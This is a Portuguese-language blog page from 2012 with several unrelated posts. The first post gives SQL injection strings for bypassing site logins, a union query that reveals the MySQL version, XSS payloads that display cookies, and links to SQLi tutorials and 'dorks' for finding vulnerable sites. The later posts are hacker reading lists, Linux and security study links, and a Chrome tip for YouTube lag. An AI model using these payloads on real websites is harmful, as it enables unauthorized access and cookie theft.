Pesquisar

27 de dez de 2012

Exemplo de Ataques XSS e de SQL Injection

... Vamos aos rápidos exemplos:

Esse código de SQL injection é inserido no campo de Login ou Username de um site, onde faz com que ele se autentique como aquele usuário com uma senha qualquer:


‘or’=1    '
)or('a'='a
‘or=1
')or('1'='1
‘or’a’=‘a
'or'1'='1


e é colocado uma senha como: xxx

Esse código Mostra a versão do Banco de Dados de MYSQL, onde user123 é conhecido pelo Hacker: 'user123' or 1=(select @@version)--    ou    ' union select @@version,1,1--


Vamos ao XSS (inserindo na URL):

Exibindo Cookies:

'"><script>alert('xss');alert(document.cookie)</script>      ou
<script>alert('xss');alert(document.cookie)</script>

SQLi Tutorial

Tutorial de SQLi + 9000 Dorks:

Tutorial SQLi: http://pastebin.com/LzJmLxR1
Dorks Básicas : http://pastebin.com/zzTkMvjj
Mais outras Dorks: http://pastebin.com/7gCE0bkF

Então, o que seria SQLi e uma Dork?

Dorks são partes do link do site (URL) nas quais contém strings (cadeia de caracteres) que podem estar vulneráveis à ataques SQL e até XSS.

SQLi é uma falha onde o invasor faz com que o banco de dados de um servidor libere informações de usuários e senhas, por exemplo, comprometendo assim a segurança do site junto a seu conteúdo.


Como ser um Hacker?

Essa é uma dúvida frequente dos entusiastas ou de pessoas que queiram seguir um padrão de vida relacionado a segurança da informação.

Trago-lhes o caminho da solução para essas perguntas de formas simples.

Vejamos:

Leituras obrigatórias:

http://pt.wikipedia.org/wiki/Hacker - Wikipédia sobre Hackers

Arquivo traduzido da página de como ser um Hacker, do Jargão Hacker (escrito por Eric Raymond): http://jvdm.sdf.org/pt/raquer-howto/

Jargon File (original em inglês): http://catb.org/jargon/ - Jargão Hacker, de Eric Raymond;

Sobre o Glider (emblema, ou símbolo Hacker):
http://www.checkup.med.br/historico/manter/emblema/faqs.html

Após ler esse materias todo acima (exceto o Jargon em inglês), já podemos ver que virar um pouco programador, entender de redes, criptografia e um monte de outras coisas, é necessário e fundamental! Então, desejo bons estudos!


Como é usar Linux/Unix?

Vamos começar aí tutoriais mostrando as diferenças com relação ao Windows, colocarei materiais e cursos grátis, entre outros artigos...

Você pode acessar a DistroWatch ou no iBiblio para escolher uma distribuição Linux que lhe agrade, lá você encontrará a versão e informações sobre o escolhido Linux.

Leituras :

http://pt.wikipedia.org/wiki/Linux - Wikipédia sobre Linux
http://pt.wikipedia.org/wiki/Linux_(n%C3%BAcleo) - Wikipédia sobre o núcleo Linux.

Acesse: Curso pela web de Linux da USP

Leia: Apostila oficial de introdução no Linux

Não pode deixar de ler!: Apostila Curo básico de Linux da UFLA






Material de segurança computacional e segurança de redes - Grátis!

Segue os links abaixo!:

ftp://ftp.registro.br/pub/gts/  - Este link é do "registro.br", site grátis nacional, de domínios ".br"

http://www.inf.ufsc.br/~bosco/ensino/ine5680/ - Este é do Professor Bosco da UFSC, e no diretório acima, você encontrará mais material.

http://www.cert.br/docs/palestras/ - Este é do CERT, órgão que cuida do status da segurança no Brasil.

http://www.cgi.br/publicacoes/index.htm - Este é do Comitê Gestor de Internet no Brasil, disponibilizando revistas, artigos, livros, etc.

http://www.cgi.br/gt/gtbv/gtbv.htm - Ainda no CGI, você encontra as bibliotecas onlines, no qual pode-se fazer pesquisas.

http://br.librosintinta.in/ - Biblioteca de procura de PDFs, aqui pode-se procurar material (tem demais!)

http://internetsegura.br/ - Para os mais leigos, aqui está uma página de recomendações de segurança na internet, ainda sim, um órgão brasileiro.

http://ipv6.br/curso/ - Curso de rede IPV6 grátis;
http://ipv6.br/download/

http://www.cetic.br/palestras/index.htm
http://www.cetic.br/publicacoes/index.htm



http://www.wdl.org/pt/search/gallery/ - Biblioteca digital mundial;

Livraria Aberta - Por enquanto, é uma mera cópia do Dominio Público.

Biblioteca Digital da unicamp - Ache aqui artigos computacionais;

http://www.dominiopublico.gov.br/ - Dominio Público: é possíver achar material computacional aqui.


4 de dez de 2012

Como deixar os vídeos do Youtube sem lag (Google Chrome)

Vamos lá ,Primeiro: 
  1. Abra seu navegador Google Chrome;
  2. Abra uma nova aba;
  3. Agora digite: "about:plugins" (sem aspas) e aperte "Enter";
  4. No topo você vai ver, um dos primeiros plugins: Adobe Flash Player
  5. Ao extremo lado direito do plugin, você verá escrito: "+ Detalhes", clique ali.
  6. Desative TODAS as versões antigas do Flash player e deixe apenas a atual;
  7. Agora ative ali em baixo no plugin do flash player: "Sempre permitido"
  8. sem clicar em mais nada, agora já pode fechar e abrir: http://www.youtube.com/
  9. Aproveite.

TAGS

Videos do Youtube com lags
Videos do Youtube travando
Videos do Youtube lentos
Como deixar os vídeos do Youtube sem lag